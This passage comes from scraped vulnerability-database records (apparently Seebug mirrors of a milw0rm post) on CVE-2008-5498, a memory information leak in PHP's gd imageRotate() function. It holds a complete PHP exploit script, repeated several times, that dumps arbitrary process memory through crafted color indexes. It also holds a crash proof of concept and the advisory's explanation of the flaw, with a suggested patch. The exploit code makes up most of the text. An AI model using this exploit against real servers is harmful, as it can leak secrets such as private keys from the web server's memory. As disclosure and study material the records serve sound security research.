at [0,0] would be filled by back color,thus $f_b has the return value of gdTrueColorAlpha function. All we need to do is decoding its value. The final value of $f_b is calculated as following:\r\n$f_b = gdTrueColorAlpha( M[$address-512],\r\n M[$address-255],\r\n M[$address+0],\r\n M[$address+1034]);\r\n\r\nThese offsets [-512, -255, 0, 1034] are the displacements in gdImageStruct's arrays.\r\nDecoding $f_b\r\nAs you can see in the source code $f_b is calculated like this:\r\n----------------------------------------------------------\r\na\t:A4\tA3\tA2\tA1\r\nr\t:\tR4\tR3\tR2\tR1\r\ng\t:\t\tG4\tG3\tG2\tG1\r\nb\t:\t\t\tB4\tB3\tB2\tB1\r\n----------------------------------------------------------\r\n$f_b\t:\t\t\tF4\tF3\tF2\tF1\r\n----------------------------------------------------------\r\n\r\nWe have used a special $index_b in order that b would have the value of memory address at $address. All we need to do is extracting b from $f_b. It is obvious that F1 has the exact value of B1( first byte of memory at $address location). To extract B2 we must have G1 values and use this equation: B2 = F2 \u0096 G1. \r\nTo calculate B3 and B4 we will also need G2, G3, R1, R2, A1. These bytes values can also be grabbed by using imagerotate function and sending special indexes other than $index_b. For more information see the comments in exploit source code.\r\n\r\n\r\n\r\nExploit: \r\n<?php \r\n/* \r\nedi = src \r\nesi = clrBack ( -205923 for core_globals safe mode ( 0x IF APR SM MQS) sample: 0x01 00 SM 00 ) \r\n\r\n( \r\n\tzend_bool magic_quotes_sybase;\t\t\tMQS \r\n\tzend_bool safe_mode;\t\t\t\tSM \r\n\tzend_bool allow_call_time_pass_reference;\t\tAPR \r\n\tzend_bool implicit_flush;\t\t\t\tIF \r\n) \r\n\r\n0x080ed27f <php_gd_gdImageSkewX+1135>: mov 0x10(%edi,%esi,4),%ebx \r\nmov ebx, [edi+esi*4+10] \r\n\r\ntest case: \r\nedi = 0x084c6128 \r\nesi = 0xffee07b1(-1177679) values less than this will crash. \r\n=> \r\nebx = 0x8047ff6 \r\n\r\nif (a>127) { \r\n\ta = 127; \r\n} \r\n:( since alpha blending is on by default, the 32th bit of dumped address cant be detected. \r\n*/ \r\n$debug = 0; \r\n$address = hexdec($argv[1]); \r\n$addressSave = $address; \r\n$count = $argv[3]+1; \r\n$mode = $argv[2]; \r\n$src = 0x84cde2c; \r\n$s = 10; //image size \r\n\r\n$GLOBALS["image"]=imagecreate($s,$s); \r\n$r = $GLOBALS["image"]; \r\nif( $debug ) \r\n\techo "Image created.\\n"; \r\n\r\nfunction getDataFromImage( $index ) { \r\n\t$tmp = imagerotate ($GLOBALS["image"],5,$index); \r\n\treturn imagecolorat( $tmp, 0,0); \r\n} \r\n\r\n$eor = 0; \r\nwhile( $address < $addressSave+$count*4 ) { \r\n\t// indexes \r\n\t$index_b = (int)(($src - $address + 0x810)/4); \r\n\t$index_g = $index_b + 256; \r\n\t$index_r = $index_b + 512; \r\n\t$index_a = $index_b - 1034; \r\n\t//$index_gG is the same as index of r \r\n\t$index_gR = $index_g + 512; \r\n\t//$index_rG is the same as index of gR \r\n\t//$index_gGg is the same as index of gR \r\n\r\n\t// fuctions \r\n\t$f_b = getDataFromImage( -$index_b ); \r\n\t$f_g = getDataFromImage( -$index_g ); \r\n\t$f_r = getDataFromImage( -$index_r ); \r\n\t$f_a = getDataFromImage( -$index_a ); \r\n\t$f_gR = getDataFromImage( -$index_gR ); \r\n\r\n\t/********************* Byte 1 **********************/ \r\n\r\n\t// b byte 1 \r\n\t$byte_b1 = $f_b & 0x000000ff; \r\n\tif( $debug ) \r\n\t\tprintf( "b:1-0x%x\\n", $byte_b1 ); \r\n\r\n\t//g byte 1 \r\n\t$byte_g1 = $f_g & 0x000000ff; \r\n\tif( $debug ) \r\n\t\tprintf( "g:1-0x%x\\n", $byte_g1 ); \r\n\r\n\t//r byte 1 \r\n\t$byte_r1 = $f_r& 0x000000ff; \r\n\tif( $debug ) \r\n\t\tprintf( "r:1-0x%x\\n", $byte_r1 ); \r\n\r\n\t//a byte 1 \r\n\t$byte_a1 = $f_a & 0x000000ff; \r\n\tif( $debug ) \r\n\t\tprintf( "a:1-0x%x\\n\\n", $byte_a1 ); \r\n \r\n\t/* Relative */ \r\n\r\n\t// gG byte 1 \r\n\t// this is relative g to `g`( suppose that 'g' is a b). so its right at the position of r. \r\n\t$byte_gG1 = $byte_r1; \r\n\r\n\t// gR byte 1 \r\n\t// this is relative r to `g`( suppose that 'g' is a b) \r\n\t$byte_gR1 = $f_gR & 0x000000ff; \r\n\r\n\t// rG byte 1 \r\n\t// this is relative g to r( suppose that 'r' is a b) \r\n\t$byte_rG1 = $byte_gR1; \r\n\r\n\t/* 2 Level Relative */ \r\n\r\n\t// gGg byte 1 \r\n\t// this is relative g to `gG`( suppose that 'gG' is a b) \r\n\t$byte_gGg1 = $byte_gR1; \r\n\r\n\t/********************* Byte 2 **********************/ \r\n\r\n\t// b byte 2 \r\n\t$sum_b2_g1 = (($f_b & 0x0000ff00) >> 8 ); \r\n\t$byte_b2 = $sum_b2_g1 - $byte_g1; \r\n\t$borrow_b2 = 0; \r\n\tif( $byte_b2 < 0 ) \r\n\t\t$borrow_b2 = 1; \r\n\t$byte_b2 = $byte_b2 & 0x000000ff; \r\n\tif( $debug ) \r\n\t\tprintf( "b:2-0x%x \\t0x%x\\n", $byte_b2, $f_b ); \r\n\r\n\t// g byte 2 \r\n\t$sum_g2_gG1 = (($f_g & 0x0000ff00) >> 8 ); \r\n\t$byte_g2 = $sum_g2_gG1 - $byte_gG1; \r\n\t$borrow_g2 = 0; \r\n\tif( $byte_g2 < 0 ) \r\n\t\t$borrow_g2 = 1; \r\n\t$byte_g2 = $byte_g2 & 0x000000ff; \r\n\tif( $debug ) \r\n\t\tprintf( "g:2-0x%x \\t0x%x\\n", $byte_g2, $f_gG1 ); \r\n\r\n\t// r byte 2 \r\n\t$sum_r2_rG1 = (($f_r& 0x0000ff00) >> 8 ); \r\n\t$byte_r2 = $sum_r2_rG1 - $byte_rG1; \r\n\t$byte_r2 = $byte_r2 & 0x000000ff; \r\n\tif( $debug ) \r\n\t\tprintf( "r:2-0x%x \\t0x%x\\n\\n", $byte_r2, $sum_r2_rG1 ); \r\n\r\n\t/* Relative */ \r\n\r\n\t// gG byte 2 \r\n\t$byte_gG2 = $byte_r2; \r\n\r\n\t/********************* Byte 3 **********************/ \r\n\r\n\t// b byte 3 \r\n\t$sum_b3_g2_r1_br2 = (($f_b & 0x00ff0000) >> 16 ); \r\n\t$sum_b3_g2_r1 = $sum_b3_g2_r1_br2 - $borrow_b2; \r\n\t$sum_b3_g2 = $sum_b3_g2_r1 - $byte_r1; \r\n\t$byte_b3 = $sum_b3_g2 - $byte_g2; \r\n\t$borrow_b3 = 0; \r\n\tif( $byte_b3 < 0 ) \r\n\t{ \r\n\t\t$borrow_b3 = (int)(-$byte_b3 / 0xff) + 1; // for borrows more than one \r\n\t\tif( $debug ) \r\n\t\t\tprintf( "\\nborrow was: %d\\n" , $borrow_b3 ); \r\n\t} \r\n\t$byte_b3 = $byte_b3 & 0x000000ff; \r\n\tif( $debug ) \r\n\t\tprintf( "b:3-0x%x \\t0x%x\\n", $byte_b3, $sum_b3_g2 ); \r\n\r\n\t// g byte 3 \r\n\t$sum_g3_gG2_gR1_br2 = (($f_g & 0x00ff0000) >> 16 ); \r\n\t$sum_g3_gG2_gR1 = $sum_g3_gG2_gR1_br2 - $borrow_g2; \r\n\t$sum_g3_gG2 = $sum_g3_gG2_gR1 - $byte_gR1; \r\n\t$byte_g3 = $sum_g3_gG2 - $byte_gG2; \r\n\t$byte_g3 = $byte_g3 & 0x000000ff; \r\n\tif( $debug ) { \r\n\t\tprintf( "f_g: 0x%x\\n" , $f_g); \r\n\t\tprintf( "sum_g3_gG2_gR1_br2: 0x%x\\n" , $sum_g3_gG2_gR1_br2 ); \r\n\t\tprintf( "sum_g3_gG2_gR1: 0x%x\\n" , $sum_g3_gG2_gR1 ); \r\n\t\tprintf( "sum_g3_gG2: 0x%x\\n" , $sum_g3_gG2 ); \r\n\t\tprintf( "g:3-0x%x \\t0x%x\\n\\n", $byte_g3, $sum_b3_g2 ); \r\n\t} \r\n\r\n\t/********************* Byte 4 **********************/ \r\n\r\n\t// b byte 4 \r\n\t$sum_b4_g3_r2_a1_br3 = (($f_b & 0xff000000) >> 24 ); \r\n\t$sum_b4_g3_r2_a1 = $sum_b4_g3_r2_a1_br3 - $borrow_b3; \r\n\t$sum_b4_g3_r2 = $sum_b4_g3_r2_a1 - $byte_a1; \r\n\t$sum_b4_g3 = $sum_b4_g3_r2 - $byte_r2; \r\n\t$byte_b4 = $sum_b4_g3 - $byte_g3; \r\n\t$byte_b4 = $byte_b4 & 0x000000ff; \r\n\tif( $debug ) { \r\n\t\tprintf( "f_b: 0x%x\\n" , $f_b); \r\n\t\tprintf( "sum_b4_g3_r2_a1_br3: 0x%x\\n" , $sum_b4_g3_r2_a1_br3 ); \r\n\t\tprintf( "sum_b4_g3_r2_a1: 0x%x\\n" , $sum_b4_g3_r2_a1 ); \r\n\t\tprintf( "sum_b4_g3_r2: 0x%x\\n" , $sum_b4_g3_r2 ); \r\n\t\tprintf( "sum_b4_g3: 0x%x\\n" , $sum_b4_g3 ); \r\n\t\tprintf( "b:4-0x%x\\n\\n", $byte_b4); \r\n\t} \r\n\t/********************* Byte **********************/ \r\n\r\n\tif($mode == 0) { //text mode \r\n\t\tprintf( "%c%c%c%c", $byte_b1, $byte_b2, $byte_b3, $byte_b4); \r\n\t} elseif( $mode == 1) { \r\n\t\t// b \r\n\t\tif( !$eor ) \r\n\t\t\tprintf( "0x%x:\\t", $address ); \r\n\t\tprintf( "0x%x(%c)\\t0x%x(%c)\\t0x%x(%c)\\t0x%x(%c)\\t", $byte_b1, $byte_b1, \r\n\t\t\t\t\t\t\t\t\t\t $byte_b2, $byte_b2, \r\n\t\t\t\t\t\t\t\t\t\t $byte_b3, $byte_b3, \r\n\t\t\t\t\t\t\t\t\t\t $byte_b4, $byte_b4 ); \r\n\r\n\t\t$eor = !$eor; \r\n\t\tif( !$eor ) \r\n\t\t\techo "\\n"; \r\n\t} else { \r\n\t\t$val = ($byte_b4 << 24) + ($byte_b3 << 16) + ($byte_b2 << 8) + $byte_b1; \r\n\t\tprintf( "0x%x: 0x%x\\n", $address, $val ); \r\n\t} \r\n\t$address+=4; \r\n} \r\n?> \r\n \r\nCredit\r\nThis vulnerability has been discovered by Hamid Ebadi from Amirkabir University of Technology APA laboratory.\r\nautcert@aut.ac.ir\r\nhttps://www.ircert.cc\r\n\r\nDisclosure: October 2008\r\nReport to vendor: December, 10, 2008\r\n\r\n# milw0rm.com [2009-01-02]\r\n\n ", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-66122"}, {"lastseen": "2017-11-19T19:03:04", "bulletinFamily": "exploit", "description": "BUGTRAQ ID: 33002\r\nCVE(CAN) ID: CVE-2008-5498\r\n\r\nPHP\u662f\u5e7f\u6cdb\u4f7f\u7528\u7684\u901a\u7528\u76ee\u7684\u811a\u672c\u8bed\u8a00\uff0c\u7279\u522b\u9002\u5408\u4e8eWeb\u5f00\u53d1\uff0c\u53ef\u5d4c\u5165\u5230HTML\u4e2d\u3002\r\n\r\nPHP\u7684imageRotate\u51fd\u6570\u4e2d\u5b58\u5728\u6570\u7ec4\u7d22\u5f15\u9519\u8bef\uff0c\u5141\u8bb8\u8fdc\u7a0b\u653b\u51fb\u8005\u901a\u8fc7\u5411\u7d22\u5f15\u7684\u56fe\u7247\u63d0\u4ea4\u7279\u5236\u7684bgd_color\u6216clrBack \u53c2\u6570\u503c\u8bfb\u53d6\u4efb\u610f\u5185\u5b58\u4f4d\u7f6e\u7684\u5185\u5bb9\u3002\r\n\n\nPHP 5.2.8\n \u5382\u5546\u8865\u4e01\uff1a\r\n\r\nPHP\r\n---\r\n\u76ee\u524d\u5382\u5546\u8fd8\u6ca1\u6709\u63d0\u4f9b\u8865\u4e01\u6216\u8005\u5347\u7ea7\u7a0b\u5e8f\uff0c\u6211\u4eec\u5efa\u8bae\u4f7f\u7528\u6b64\u8f6f\u4ef6\u7684\u7528\u6237\u968f\u65f6\u5173\u6ce8\u5382\u5546\u7684\u4e3b\u9875\u4ee5\u83b7\u53d6\u6700\u65b0\u7248\u672c\uff1a\r\n\r\n<a href=http://www.php.net target=_blank rel=external nofollow>http://www.php.net</a>", "modified": "2008-12-30T00:00:00", "published": "2008-12-30T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-4604", "id": "SSV:4604", "type": "seebug", "title": "PHP imageRotate()\u672a\u521d\u59cb\u5316\u5185\u5b58\u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e", "sourceData": "\n <?php \r\n/* \r\nedi = src \r\nesi = clrBack ( -205923 for core_globals safe mode ( 0x IF APR SM MQS)\r\nsample: 0x01 00 SM 00 ) \r\n\r\n( \r\n zend_bool\r\nmagic_quotes_sybase; MQS \r\n zend_bool safe_mode; SM \r\n zend_bool allow_call_time_pass_reference; APR \r\n zend_bool\r\nimplicit_flush; IF \r\n) \r\n\r\n0x080ed27f <php_gd_gdImageSkewX+1135>: mov 0x10(%edi,%esi,4),%ebx \r\nmov ebx, [edi+esi*4+10] \r\n\r\ntest case: \r\nedi = 0x084c6128 \r\nesi = 0xffee07b1(-1177679) values less than this will crash. \r\n=> \r\nebx = 0x8047ff6 \r\n\r\nif (a>127) { \r\n a = 127; \r\n} \r\n:( since alpha blending is on by default, the 32th bit of dumped address cant be detected. \r\n*/ \r\n$debug = 0; \r\n$address = hexdec($argv[1]); \r\n$addressSave = $address; \r\n$count = $argv[3]+1; \r\n$mode = $argv[2]; \r\n$src = 0x84cde2c; \r\n$s = 10; //image size \r\n\r\n$GLOBALS["image"]=imagecreate($s,$s); \r\n$r = $GLOBALS["image"]; \r\nif( $debug ) \r\n echo "Image created.\\n"; \r\n\r\n\r\nfunction getDataFromImage( $index ) { \r\n $tmp = imagerotate ($GLOBALS["image"],5,$index); \r\n return imagecolorat( $tmp, 0,0); \r\n} \r\n\r\n$eor = 0; \r\nwhile( $address < $addressSave+$count*4 ) { \r\n // indexes \r\n $index_b = (int)(($src - $address + 0x810)/4); \r\n $index_g = $index_b + 256; \r\n $index_r = $index_b + 512; \r\n $index_a = $index_b - 1034; \r\n //$index_gG is the same as index of r \r\n $index_gR = $index_g + 512; \r\n //$index_rG is the same as index of gR \r\n //$index_gGg is the same as index of gR \r\n\r\n // fuctions \r\n $f_b = getDataFromImage( -$index_b ); \r\n $f_g = getDataFromImage( -$index_g ); \r\n $f_r = getDataFromImage( -$index_r ); \r\n $f_a = getDataFromImage( -$index_a ); \r\n $f_gR = getDataFromImage( -$index_gR ); \r\n/\r\n /********************* Byte 1 **********************/ \r\n\r\n // b byte 1 \r\n $byte_b1 = $f_b & 0x000000ff; \r\n if( $debug ) \r\n printf( "b:1-0x%x\\n", $byte_b1 ); \r\n\r\n //g byte 1 \r\n $byte_g1 = $f_g & 0x000000ff; \r\n if( $debug ) \r\n printf( "g:1-0x%x\\n", $byte_g1 ); \r\n\r\n //r byte 1 \r\n $byte_r1 = $f_r& 0x000000ff; \r\n if( $debug ) \r\n printf( "r:1-0x%x\\n", $byte_r1 ); \r\n\r\n //a byte 1 \r\n $byte_a1 = $f_a & 0x000000ff; \r\n if( $debug ) \r\n printf( "a:1-0x%x\\n\\n", $byte_a1 ); \r\n\r\n /* Relative */ \r\n\r\n // gG byte 1 \r\n // this is relative g to `g`( suppose that 'g' is a b). so its right at the position of r. \r\n $byte_gG1 = $byte_r1; \r\n\r\n // gR byte 1 \r\n // this is relative r to `g`( suppose that 'g' is a b) \r\n $byte_gR1 = $f_gR & 0x000000ff; \r\n\r\n // rG byte 1 \r\n // this is relative g to r( suppose that 'r' is a b) \r\n $byte_rG1 = $byte_gR1; \r\n\r\n /* 2 Level Relative */ \r\n\r\n // gGg byte 1 \r\n // this is relative g to `gG`( suppose that 'gG' is a b) \r\n $byte_gGg1 = $byte_gR1; \r\n\r\n /********************* Byte 2 **********************/ \r\n\r\n // b byte 2 \r\n $sum_b2_g1 = (($f_b & 0x0000ff00) >> 8 ); \r\n $byte_b2 = $sum_b2_g1 - $byte_g1; \r\n $borrow_b2 = 0; \r\n if( $byte_b2 < 0 ) \r\n $borrow_b2 = 1; \r\n $byte_b2 = $byte_b2 & 0x000000ff; \r\n if( $debug ) \r\n printf( "b:2-0x%x \\t0x%x\\n", $byte_b2, $f_b ); \r\n\r\n // g byte 2 \r\n\r\n $sum_g2_gG1 = (($f_g & 0x0000ff00) >> 8 ); \r\n $byte_g2 = $sum_g2_gG1 - $byte_gG1; \r\n $borrow_g2 = 0; \r\n if( $byte_g2 < 0 ) \r\n $borrow_g2 = 1; \r\n $byte_g2 = $byte_g2 & 0x000000ff; \r\n if( $debug ) \r\n printf( "g:2-0x%x \\t0x%x\\n", $byte_g2, $f_gG1 ); \r\n\r\n // r byte 2 \r\n $sum_r2_rG1 = (($f_r& 0x0000ff00) >> 8 ); \r\n $byte_r2 = $sum_r2_rG1 - $byte_rG1; \r\n $byte_r2 = $byte_r2 & 0x000000ff; \r\n if( $debug ) \r\n printf( "r:2-0x%x \\t0x%x\\n\\n", $byte_r2 ,$sum_r2_rG1 ); \r\n\r\n /* Relative */ \r\n\r\n // gG byte 2 \r\n $byte_gG2 = $byte_r2; \r\n\r\n /********************* Byte 3 **********************/ \r\n\r\n // b byte 3 \r\n $sum_b3_g2_r1_br2 = (($f_b & 0x00ff0000) >> 16 ); \r\n $sum_b3_g2_r1 = $sum_b3_g2_r1_br2 - $borrow_b2; \r\n $sum_b3_g2 = $sum_b3_g2_r1 - $byte_r1; \r\n $byte_b3 = $sum_b3_g2 - $byte_g2; \r\n $borrow_b3 = 0; \r\n if( $byte_b3 < 0 ) \r\n { \r\n $borrow_b3 = (int)(-$byte_b3 / 0xff) + 1; //for borrows more than one \r\n if( $debug ) \r\n printf( "\\nborrow was: %d\\n" $borrow_b3 ); \r\n } \r\n $byte_b3 = $byte_b3 & 0x000000ff; \r\n if( $debug ) \r\n printf( "b:3-0x%x \\t0x%x\\n", $byte_b3,$sum_b3_g2 ); \r\n\r\n // g byte 3 \r\n $sum_g3_gG2_gR1_br2 = (($f_g & 0x00ff0000) >> 16 ); \r\n $sum_g3_gG2_gR1 = $sum_g3_gG2_gR1_br2 - $borrow_g2; \r\n $sum_g3_gG2 = $sum_g3_gG2_gR1 - $byte_gR1; \r\n $byte_g3 = $sum_g3_gG2 - $byte_gG2; \r\n $byte_g3 = $byte_g3 & 0x000000ff; \r\n if( $debug ) { \r\n printf( "f_g: 0x%x\\n" , $f_g); \r\n printf( "sum_g3_gG2_gR1_br2: 0x%x\\n" , $sum_g3_gG2_gR1_br2 ); \r\n\r\n printf( "sum_g3_gG2_gR1: 0x%x\\n" ,$sum_g3_gG2_gR1 ); \r\n printf( "sum_g3_gG2: 0x%x\\n" , $sum_g3_gG2 ); \r\n printf( "g:3-0x%x \\t0x%x\\n\\n", $byte_g3,$sum_b3_g2 ); \r\n } \r\n\r\n /********************* Byte 4 **********************/ \r\n\r\n // b byte 4 \r\n $sum_b4_g3_r2_a1_br3 = (($f_b & 0xff000000) >> 24 ); \r\n $sum_b4_g3_r2_a1 = $sum_b4_g3_r2_a1_br3 - $borrow_b3; \r\n $sum_b4_g3_r2 = $sum_b4_g3_r2_a1 - $byte_a1; \r\n $sum_b4_g3 = $sum_b4_g3_r2 - $byte_r2; \r\n $byte_b4 = $sum_b4_g3 - $byte_g3; \r\n $byte_b4 = $byte_b4 & 0x000000ff; \r\n if( $debug ) { \r\n printf( "f_b: 0x%x\\n" , $f_b); \r\n printf( "sum_b4_g3_r2_a1_br3: 0x%x\\n" ,$sum_b4_g3_r2_a1_br3 ); \r\n printf( "sum_b4_g3_r2_a1: 0x%x\\n" ,$sum_b4_g3_r2_a1 ); \r\n printf( "sum_b4_g3_r2: 0x%x\\n" , $sum_b4_g3_r2 ); \r\n printf( "sum_b4_g3: 0x%x\\n" , $sum_b4_g3 ); \r\n printf( "b:4-0x%x\\n\\n", $byte_b4); \r\n } \r\n /********************* Byte **********************/ \r\n\r\n if($mode == 0) { //text mode \r\n printf( "%c%c%c%c", $byte_b1, $byte_b2,$byte_b3, $byte_b4); \r\n } elseif( $mode == 1) { \r\n // b \r\n if( !$eor ) \r\n printf( "0x%x:\\t", $address ); \r\n printf("0x%x(%c)\\t0x%x(%c)\\t0x%x(%c)\\t0x%x(%c)\\t", $byte_b1, $byte_b1, \r\n \r\n $byte_b2, $byte_b2, \r\n \r\n $byte_b3, $byte_b3, \r\n \r\n $byte_b4, $byte_b4 ); \r\n\r\n $eor = !$eor; \r\n if( !$eor ) \r\n echo "\\n"; \r\n } else { \r\n $val = ($byte_b4 << 24) + ($byte_b3 << 16) +($byte_b2 << 8) + $byte_b1; \r\n printf( "0x%x: 0x%x\\n", $address, $val ); \r\n } \r\n $address+=4; \r\n} \r\n?> \r\n\r\n\r\n<?php\r\n$img = imagecreate(5,5);\r\n$tmp = imagerotate ($img,5,-9999999);\r\n?>\r\n\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-4604", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-11-19T21:19:35", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2009-01-03T00:00:00", "published": "2009-01-03T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-10377", "id": "SSV:10377", "title": "PHP <= 5.2.8 gd library - imageRotate() Information Leak Vulnerability", "type": "seebug", "sourceData": "\n PHP - gd library - imageRotate()function Information Leak Vulnerability\r\n\r\nDiscovered by: Hamid Ebadi, \r\nFurther research and exploit: Mohammad R. Roohian\r\nCSIRT Team Members\r\nAmirkabir University APA Laboratory\r\n\r\nIntroduction\r\nPHP is a popular web programming language which isnormally used as a script engine in the server side.\r\nPHP 5 which is compiledwith gd library, includes a function called imageRotate() for rotating an imageresource by giving the rotation angle.\r\nThis function fills the resulted emptyareas with a given default coloring after rotation (clrBack). \r\nGd library works with both indexed images andtruecolor images. A truecolor pixel is a DWORD which stores the color value ofthe pixel which would be displayed without any change.\r\nIn indexed mode by using an index with a sizeof no more than 1 byte, the data wouldbe fetched from a color palette which consists of parallel arrays of colorbytes. The gd library uses the same data strcture for both of these image types(gdImageStruct).\r\nAn implementation error can cause information leakage from thememory of the PHP (or possible the web server) process.\r\n\r\nInformation leak vulnerabilities allow access to e.g. the Apache memory which might contain the private RSA key for the SSL cert.If an attacker is able to read it he can perform real man in the middle attackson all SSL connections. Aside from this in the days of ASLR, NX and canaryprotections it is often vital for the success of the exploit to know exactmemory addresses. (http://www.php-security.org/)\r\n\r\nVulnerableversion\r\nPHP <= 5.2.8\r\nCVE Candidate Number: CVE-2008-5498\r\n\r\nVulnerability\r\nThe imageRotate() function does not perform any validation check on the clrBack parameter which is used as an index for the above mentioned arrays with the size of 255 in the index image type.\r\nA correct validation check for the indexed images could be:\r\n\r\nfile: php-x.y.z/ext/gd/libgd/gd.c\r\n\r\n3129: gdImagePtr gdImageRotate (gdImagePtrsrc, double dAngle,\r\n int clrBack, int ignoretransparent) \r\n3130:{ \r\n3131: gdImagePtrpMidImg; \r\n3132: gdImagePtrrotatedImg;\r\n3133:\r\n3134: if(src == NULL) { \r\n3135: returnNULL; \r\n3136: }\r\n3137:+\r\n3137:+ // Index check\r\n3137:+ if (!src->truecolor) \r\n3137:+ clrBack &= 0xff; // Just keep the first byte\r\n3137:+\r\n3138: if(!gdImageTrueColor(src) && clrBack>=gdImageColorsTotal(src)) { \r\n3139: returnNULL; \r\n3140: }\r\n\r\nWhile rotating indexed image, gd retrives the final backcolor from 4 parallel arrays(red, green, blue and alpha) with length of 255 and uses clrBack as the indexof these arrays.\r\nBy providing a special clrBack value (more than 255) we can read almost any address in php memory:\r\n\r\nfile: php-x.y.z/ext/gd/libgd/gd.h\r\n\r\ntypedef struct gdImageStruct { \r\n \r\n --snip snip -- \r\n \r\n intred[gdMaxColors]; \r\n intgreen[gdMaxColors]; \r\n intblue[gdMaxColors]; \r\n \r\n --snip snip -- \r\n \r\n intalpha[gdMaxColors]; \r\n /*Truecolor flag and pixels. New 2.0 fields appear here at the \r\n endto minimize breakage of existing object code. */ \r\n inttrueColor; \r\n \r\n --snip snip -- \r\n \r\n} gdImage; \r\n\r\ntypedef gdImage * gdImagePtr; \r\n\r\nthen uses gdTrueColorAlpha macro to combinethe 4 mentioned values. gdTrueColorAlpha macro is implemented as following: \r\n\r\nfile: php-x.y.z/ext/gd/libgd/gd.h\r\n\r\n#define gdTrueColorAlpha(r, g, b, a) (((a)<< 24) + \\\r\n ((r)<< 16) + \\\r\n ((g)<< 8) + \\\r\n (b))\r\n\r\nThe final color value is the output of gdTrueColorAlpha macro which will be used as background color. gdTrueColorAlpha uses '+' (add) instead of '&'(and). While the '+' operator is slower, it also causes a security issue. By using a reverse function we can calculate almost any desired memory address.\r\n\r\nProof of concept:\r\nThis script would cause a segmentation faultbecause -9999999 would result in reading an invalid memory address in PHP process:\r\n\r\n<?php\r\n\r\n$img = imagecreate(5,5);\r\n$tmp = imagerotate ($img,5,-9999999);\r\n\r\n?>\r\nExploitation :\r\nWe need to provide a good clrBack to imageRotate()and then calculate the value of desired memory address by using imagecolorat() with arguments concerned with angles of the rotated image. Upper right would be a good spot (0, 0):\r\n\r\n<?php \r\n&special_index = /* index of the$address */\r\n$r=imagecreate(300,300); \r\n$gray = imagecolorallocate( $r,111,111,111); \r\nimagefilledrectangle($r,0,0,300,300,$gray);\r\n$tmp =imagerotate( $r, 30,&special_index ); \r\nimagePng( $tmp, "test.png" ); \r\n?>\r\n\r\n\r\n --------\r\n|f_b/\\\t |\r\n| / \\\t |\r\n| / \\ |\r\n|/image\t\\|\r\n|\\ /|\r\n| \\ / |\r\n| \\ /\t |\r\n| \\/\t |\r\n --------\r\n\r\nTo read encoded memory values from a desired address, we have to use the following script:\r\n\r\n<?php\r\n\r\n$address = /*address to read should bemultiply of 4 */\r\n$src = 0x84cde2c; \r\n// depends on the image size and phpscript length but is constant\r\n$index_b = -(int)(($src - $address +0x810)/4);\r\n\r\n$img = imagecreate(5,5);\r\n$tmp = imagerotate ($img,5,$index_b);\r\n$f_b = imagecolorat( $tmp,0,0);\r\n\r\n?>\r\n\r\nAfter passing $index_b as the index of arrays (red, green, blue and alphaarrays) and rotating $img (so that the values from the memory would be read), b variable takes the value of $address.\r\nThe color at [0,0] would be filled by back color,thus $f_b has the return value of gdTrueColorAlpha function. All we need to do is decoding its value. The final value of $f_b is calculated as following:\r\n$f_b = gdTrueColorAlpha( M[$address-512],\r\n M[$address-255],\r\n M[$address+0],\r\n M[$address+1034]);\r\n\r\nThese offsets [-512, -255, 0, 1034] are the displacements in gdImageStruct's arrays.\r\nDecoding $f_b\r\nAs you can see in the source code $f_b is calculated like this:\r\n----------------------------------------------------------\r\na\t:A4\tA3\tA2\tA1\r\nr\t:\tR4\tR3\tR2\tR1\r\ng\t:\t\tG4\tG3\tG2\tG1\r\nb\t:\t\t\tB4\tB3\tB2\tB1\r\n----------------------------------------------------------\r\n$f_b\t:\t\t\tF4\tF3\tF2\tF1\r\n----------------------------------------------------------\r\n\r\nWe have used a special $index_b in order that b would have the value of memory address at $address. All we need to do is extracting b from $f_b. It is obvious that F1 has the exact value of B1( first byte of memory at $address location). To extract B2 we must have G1 values and use this equation: B2 = F2 \u0096 G1. \r\nTo calculate B3 and B4 we will also need G2, G3, R1, R2, A1. These bytes values can also be grabbed by using imagerotate function and sending special indexes other than $index_b. For more information see the comments in exploit source code.\r\n\r\n\r\n\r\nExploit: \r\n<?php \r\n/* \r\nedi = src \r\nesi = clrBack ( -205923 for core_globals safe mode ( 0x IF APR SM MQS) sample: 0x01 00 SM 00 ) \r\n\r\n( \r\n\tzend_bool magic_quotes_sybase;\t\t\tMQS \r\n\tzend_bool safe_mode;\t\t\t\tSM \r\n\tzend_bool allow_call_time_pass_reference;\t\tAPR \r\n\tzend_bool implicit_flush;\t\t\t\tIF \r\n) \r\n\r\n0x080ed27f <php_gd_gdImageSkewX+1135>: mov 0x10(%edi,%esi,4),%ebx \r\nmov ebx, [edi+esi*4+10] \r\n\r\ntest case: \r\nedi = 0x084c6128 \r\nesi = 0xffee07b1(-1177679) values less than this will crash. \r\n=> \r\nebx = 0x8047ff6 \r\n\r\nif (a>127) { \r\n\ta = 127; \r\n} \r\n:( since alpha blending is on by default, the 32th bit of dumped address cant be detected. \r\n*/ \r\n$debug = 0; \r\n$address = hexdec($argv[1]); \r\n$addressSave = $address; \r\n$count = $argv[3]+1; \r\n$mode = $argv[2]; \r\n$src = 0x84cde2c; \r\n$s = 10; //image size \r\n\r\n$GLOBALS["image"]=imagecreate($s,$s); \r\n$r = $GLOBALS["image"]; \r\nif( $debug ) \r\n\techo "Image created.\\n"; \r\n\r\nfunction getDataFromImage( $index ) { \r\n\t$tmp = imagerotate ($GLOBALS["image"],5,$index); \r\n\treturn imagecolorat( $tmp, 0,0); \r\n} \r\n\r\n$eor = 0; \r\nwhile( $address < $addressSave+$count*4 ) { \r\n\t// indexes \r\n\t$index_b = (int)(($src - $address + 0x810)/4); \r\n\t$index_g = $index_b + 256; \r\n\t$index_r = $index_b + 512; \r\n\t$index_a = $index_b - 1034; \r\n\t//$index_gG is the same as index of r \r\n\t$index_gR = $index_g + 512; \r\n\t//$index_rG is the same as index of gR \r\n\t//$index_gGg is the same as index of gR \r\n\r\n\t// fuctions \r\n\t$f_b = getDataFromImage( -$index_b ); \r\n\t$f_g = getDataFromImage( -$index_g ); 